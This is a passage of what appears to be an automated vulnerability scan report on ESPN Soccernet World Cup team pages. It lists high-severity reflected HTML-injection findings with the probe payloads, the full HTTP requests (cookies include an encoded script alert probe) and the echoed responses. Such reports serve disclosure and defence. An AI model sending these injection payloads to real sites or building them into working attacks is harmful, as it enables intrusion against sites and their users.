Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:14:13 GMT
Content-Length: 81157
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Italy Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=162&6efac"><a>1119d197ed9=1&_slug_=italy&6efac">
...[SNIP]...
|
2.5. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/164/spain |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53655"><a>809ac03abe5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain53655"><a>809ac03abe5 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:00 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Sat, 06 Nov 2010 23:34:00 GMT
Content-Length: 80715
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Spain Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=164&_slug_=spain53655"><a>809ac03abe5&topId=808124&linktext=Andres+Iniesta+fires+Spain+to+glory">
...[SNIP]...
|
2.6. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/164/spain |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99b73"><a>65c93cd4adf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain?99b73"><a>65c93cd4adf=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:16 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN10
Cache-Expires: Sat, 06 Nov 2010 23:33:16 GMT
Content-Length: 80823
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Spain Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=164&99b73"><a>65c93cd4adf=1&_slug_=spain&99b73">
...[SNIP]...
|
2.7. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/202/argentina |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70388"><a>c589cccb3a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina70388"><a>c589cccb3a6 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:50 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN34
Cache-Expires: Sat, 06 Nov 2010 23:12:50 GMT
Content-Length: 81978
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Argentina Football
...[SNIP]...
<a href="/worldcup2010/team?team=202&_slug_=argentina70388"><a>c589cccb3a6&topId=805659&linktext=Heinze+wants+Maradona+to+continue">
...[SNIP]...
|
2.8. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/202/argentina |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5da"><a>9b858241cd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina?cf5da"><a>9b858241cd5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN13
Cache-Expires: Sat, 06 Nov 2010 23:12:01 GMT
Content-Length: 82086
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Argentina Football
...[SNIP]...
<a href="/worldcup2010/team?team=202&cf5da"><a>9b858241cd5=1&_slug_=argentina&cf5da">
...[SNIP]...
|
2.9. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/205/brazil |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da7b"><a>7d96bab73b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil6da7b"><a>7d96bab73b8 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:02 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:14:01 GMT
Content-Length: 81397
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Brazil Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=205&_slug_=brazil6da7b"><a>7d96bab73b8&topId=806003&linktext=Ex-Milan+coach+available">
...[SNIP]...
|
2.10. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/205/brazil |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d87"><a>b513fd88d09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil?36d87"><a>b513fd88d09=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:12:42 GMT
Content-Length: 81505
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Brazil Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=205&36d87"><a>b513fd88d09=1&_slug_=brazil&36d87">
...[SNIP]...
|
2.11. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/207/chile |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 977b9"><a>d4b442ea0d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile977b9"><a>d4b442ea0d6 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
